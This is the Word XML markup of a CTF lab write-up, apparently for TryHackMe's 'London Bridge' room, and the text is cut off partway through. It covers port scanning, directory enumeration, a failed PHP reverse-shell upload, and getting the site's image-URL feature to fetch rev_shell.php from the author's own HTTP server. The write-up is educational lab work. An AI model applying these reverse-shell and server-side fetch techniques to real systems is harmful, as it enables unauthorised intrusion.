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2F6670" w14:textId="17911BA1" w:rsidR="00D60B3C" w:rsidRPr="00ED5B8A" w:rsidRDefault="004534BB" w:rsidP="00ED5B8A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004534BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004534BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>London</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004534BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bridge</w:t>
      </w:r>
      <w:r w:rsidR="00ED5B8A" w:rsidRPr="00ED5B8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_Solution_Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50EE36" w14:textId="5F5515FC" w:rsidR="00ED5B8A" w:rsidRPr="00ED5B8A" w:rsidRDefault="00ED5B8A" w:rsidP="00ED5B8A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5B8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Written by: Yuval Quina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58096BE2" w14:textId="29338F94" w:rsidR="00ED5B8A" w:rsidRDefault="00ED5B8A" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I started this CTF by performing a Nmap tcp open ports and services scan over the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B39A4F4" w14:textId="0E68398D" w:rsidR="00C15985" w:rsidRDefault="00F148C2" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F74A1D3" wp14:editId="1BDEB6AC">
            <wp:extent cx="5706533" cy="2381878"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1688855691" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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8855691" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5716704" cy="2386123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CE54F" w14:textId="58933E4D" w:rsidR="00F148C2" w:rsidRDefault="00F148C2" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I saw that port 8080 is open, so I accessed the target’s website via the browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C892F" w14:textId="09E003F4" w:rsidR="00FD5FF9" w:rsidRDefault="00646AE8" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72045B1D" wp14:editId="322DC67F">
            <wp:extent cx="4673600" cy="3939963"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1919192847" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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9192847" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4674773" cy="3940952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19321F30" w14:textId="29A75565" w:rsidR="00646AE8" w:rsidRDefault="00646AE8" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I checked the inspector as well as the robots.txt and found nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722333BF" w14:textId="77777777" w:rsidR="00F34000" w:rsidRDefault="00F34000" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I checked the pages and found this page at the “Gallery” section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4155A46E" w14:textId="7BD9192F" w:rsidR="00646AE8" w:rsidRDefault="004A52CE" w:rsidP="00ED5B8A">
      <w:r w:rsidRPr="004A52CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52A81590" wp14:editId="30099EEB">
            <wp:extent cx="5147733" cy="2887088"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="663328397" name="תמונה 1" descr="תמונה שמכילה טקסט, שמיים, צילום מסך, רכב&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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3328397" name="תמונה 1" descr="תמונה שמכילה טקסט, שמיים, צילום מסך, רכב&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5151364" cy="2889124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F34000">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC09847" w14:textId="1A91B6B8" w:rsidR="004A52CE" w:rsidRDefault="004A52CE" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>At this point, I tried to upload</w:t>
      </w:r>
      <w:r w:rsidR="00A647B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00DC18F6">
        <w:t>his rev shell php file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC1C581" w14:textId="33EA9E19" w:rsidR="00DC18F6" w:rsidRDefault="00A7244C" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ABFE61F" wp14:editId="45C8DF30">
            <wp:extent cx="4262966" cy="1874576"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1011417063" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן, תוכנה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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1417063" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן, תוכנה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4268102" cy="1876835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6102C67E" w14:textId="1D908B48" w:rsidR="00A7244C" w:rsidRDefault="00C3383C" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>But it failed according to this message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E20F6" w14:textId="46C87B31" w:rsidR="00C3383C" w:rsidRDefault="0028406D" w:rsidP="00ED5B8A">
      <w:r w:rsidRPr="0028406D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142AEAFC" wp14:editId="13A9168E">
            <wp:extent cx="3798899" cy="1169771"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1628176267" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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8176267" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3798899" cy="1169771"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBC983" w14:textId="16B1946F" w:rsidR="0028406D" w:rsidRDefault="007552F8" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>After this fail, I opened the inspector and found this message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285ED0EC" w14:textId="23BCFD62" w:rsidR="007552F8" w:rsidRDefault="007552F8" w:rsidP="00ED5B8A">
      <w:r w:rsidRPr="007552F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24517118" wp14:editId="636C6D0C">
            <wp:extent cx="2636748" cy="502964"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1065564318"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5564318" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2636748" cy="502964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4678E1B8" w14:textId="4B68E166" w:rsidR="004D66D2" w:rsidRDefault="009328FC" w:rsidP="00CE581D">
      <w:r>
        <w:t>Now, I knew that I can somehow upload images (</w:t>
      </w:r>
      <w:r w:rsidR="000E6E3E">
        <w:t>including the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rev shell file) using links in </w:t>
      </w:r>
      <w:r w:rsidR="00C24DAE">
        <w:t>some way</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004717BD">
        <w:t xml:space="preserve"> I tried to</w:t>
      </w:r>
      <w:r w:rsidR="007B28C4">
        <w:t xml:space="preserve"> upload </w:t>
      </w:r>
      <w:r w:rsidR="00112516">
        <w:t>a regular image, and it worked so I found that there is a file type filter system</w:t>
      </w:r>
      <w:r w:rsidR="00CE581D">
        <w:t xml:space="preserve">. I also tried using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE581D">
        <w:t>burpsuit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE581D">
        <w:t xml:space="preserve"> to add to the file content the png magic </w:t>
      </w:r>
      <w:r w:rsidR="00E16868">
        <w:t>number,</w:t>
      </w:r>
      <w:r w:rsidR="00CE581D">
        <w:t xml:space="preserve"> but it still didn’t work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53379F0F" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="33FA2455" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="183C2050" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="67175AED" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="7D9499AD" w14:textId="11E53BA2" w:rsidR="0069388D" w:rsidRDefault="0069388D" w:rsidP="00CE581D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Then, I moved to enumerate directories using </w:t>
      </w:r>
      <w:r w:rsidR="00A3598F">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r>
        <w:t>. I found an new directory named “</w:t>
      </w:r>
      <w:r w:rsidR="00C32775" w:rsidRPr="00C32775">
        <w:t>/dejaview</w:t>
      </w:r>
      <w:r w:rsidR="00C32775">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00A3598F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151B5A7" w14:textId="519814E9" w:rsidR="00C32775" w:rsidRDefault="00C32775" w:rsidP="00CE581D">
      <w:r w:rsidRPr="00C32775">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5267210F" wp14:editId="457044DB">
            <wp:extent cx="6409266" cy="2598257"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1262715204" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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2715204" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6414664" cy="2600445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5DCEC" w14:textId="4E3E96F7" w:rsidR="00CE581D" w:rsidRDefault="008111E6" w:rsidP="006D362B">
      <w:r>
        <w:t>This is the page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D049706" w14:textId="00AD5A44" w:rsidR="009328FC" w:rsidRDefault="006D362B" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="156C8433" wp14:editId="38E7F387">
            <wp:extent cx="3609837" cy="2277534"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1217930456" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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7930456" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3613394" cy="2279778"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8A8B1" w14:textId="6FD34A07" w:rsidR="00787A23" w:rsidRDefault="00972F0E" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00403863">
        <w:t xml:space="preserve">tried to give a URL for an image </w:t>
      </w:r>
      <w:r w:rsidR="00787A23">
        <w:t>from the gallery, and it worked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B7B20D" w14:textId="00448BE2" w:rsidR="00787A23" w:rsidRDefault="00787A23" w:rsidP="00787A23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B70C4E" wp14:editId="7BD49DF8">
            <wp:extent cx="3090151" cy="2730500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2065505132" name="תמונה 1" descr="תמונה שמכילה הנעלה, לבוש, ענן, אדם&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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5505132" name="תמונה 1" descr="תמונה שמכילה הנעלה, לבוש, ענן, אדם&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3093137" cy="2733139"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="047653DE" w14:textId="1C7D251B" w:rsidR="00787A23" w:rsidRDefault="00787A23" w:rsidP="00272BBC">
      <w:r>
        <w:t xml:space="preserve">Now, I </w:t>
      </w:r>
      <w:r w:rsidR="008A2C6D">
        <w:t xml:space="preserve">tried to give </w:t>
      </w:r>
      <w:r w:rsidR="00272BBC">
        <w:t>an URL</w:t>
      </w:r>
      <w:r w:rsidR="008A2C6D">
        <w:t xml:space="preserve"> from another source on the </w:t>
      </w:r>
      <w:r w:rsidR="00230B84">
        <w:t>internet,</w:t>
      </w:r>
      <w:r w:rsidR="008A2C6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00255891">
        <w:t>and it also worked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED8DEF5" w14:textId="1481B1AB" w:rsidR="002C558A" w:rsidRDefault="00515E58" w:rsidP="00787A23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E89B93F" wp14:editId="43F36323">
            <wp:extent cx="1627236" cy="2548466"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="532896258" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, סרטים מצוירים, איור&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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2896258" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, סרטים מצוירים, איור&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1630673" cy="2553848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5AF480" w14:textId="77777777" w:rsidR="004571C3" w:rsidRDefault="00515E58" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">Now, I </w:t>
      </w:r>
      <w:r w:rsidR="005F528F">
        <w:t xml:space="preserve">established a basic python http </w:t>
      </w:r>
      <w:r w:rsidR="004E02BE">
        <w:t xml:space="preserve">server on my machine so I can share the rev shell </w:t>
      </w:r>
      <w:r w:rsidR="004571C3">
        <w:t>file to the website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E93C97" w14:textId="77777777" w:rsidR="00031B9D" w:rsidRDefault="00031B9D" w:rsidP="00787A23">
      <w:r w:rsidRPr="00031B9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06395D52" wp14:editId="61BDBC73">
            <wp:extent cx="3703641" cy="369602"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="513147269"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3147269" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3703641" cy="369602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D927BC" w14:textId="52BECA41" w:rsidR="00515E58" w:rsidRDefault="00031B9D" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">After checking the server, I called the file from the website using this URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00F37F9B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.9.3.192:8000/rev_shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18C273BA" w14:textId="17F95DC9" w:rsidR="00AC4AEE" w:rsidRDefault="00AC4AEE" w:rsidP="00787A23">
      <w:r>
        <w:t>and the server got the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16955BEB" w14:textId="3E6FE50C" w:rsidR="00031B9D" w:rsidRDefault="00AC4AEE" w:rsidP="00787A23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65B2CD9B" wp14:editId="1EAE1B6F">
            <wp:extent cx="7556500" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="314794220"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4794220" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="390525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="239129CE" w14:textId="2082B07F" w:rsidR="00133044" w:rsidRDefault="00336297" w:rsidP="00787A23">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I opened Burpsuite again and found that the packet contains the parameter “image_url” which indicate the file’s url so maybe there is another </w:t>
      </w:r>
      <w:r w:rsidR="00332C78">
        <w:t>parameter according to the thm’s hint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F64283" wp14:editId="4A9753EB">
            <wp:extent cx="6074833" cy="2741843"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1143280123" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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3280123" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6081738" cy="2744960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7E8FB" w14:textId="068E6836" w:rsidR="00CB4849" w:rsidRDefault="00D25AD0" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">Now, I </w:t>
      </w:r>
      <w:r w:rsidR="000F6400">
        <w:t xml:space="preserve">wanted to bruteforce parameters names </w:t>
      </w:r>
      <w:r w:rsidR="00EB79C0">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00AD0C68">
        <w:t xml:space="preserve">“FFUF” </w:t>
      </w:r>
      <w:r w:rsidR="00EC3AD2">
        <w:t>in order to discover additional one</w:t>
      </w:r>
      <w:r w:rsidR="0045140D">
        <w:t xml:space="preserve">s that will enable me to do </w:t>
      </w:r>
      <w:r w:rsidR="006860D1">
        <w:t>more operations</w:t>
      </w:r>
      <w:r w:rsidR="00B44702">
        <w:t xml:space="preserve"> than just see </w:t>
      </w:r>
      <w:r w:rsidR="007B0FE3">
        <w:t xml:space="preserve">some </w:t>
      </w:r>
      <w:r w:rsidR="00B44702">
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidR="0045140D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B91B08" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="4D9EF396" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="4ECE6FB6" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="093E31F6" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="5D5EC5A3" w14:textId="5A07C7EC" w:rsidR="004A6C2F" w:rsidRDefault="0045140D" w:rsidP="009A2520">
      <w:r>
        <w:lastRenderedPageBreak/>
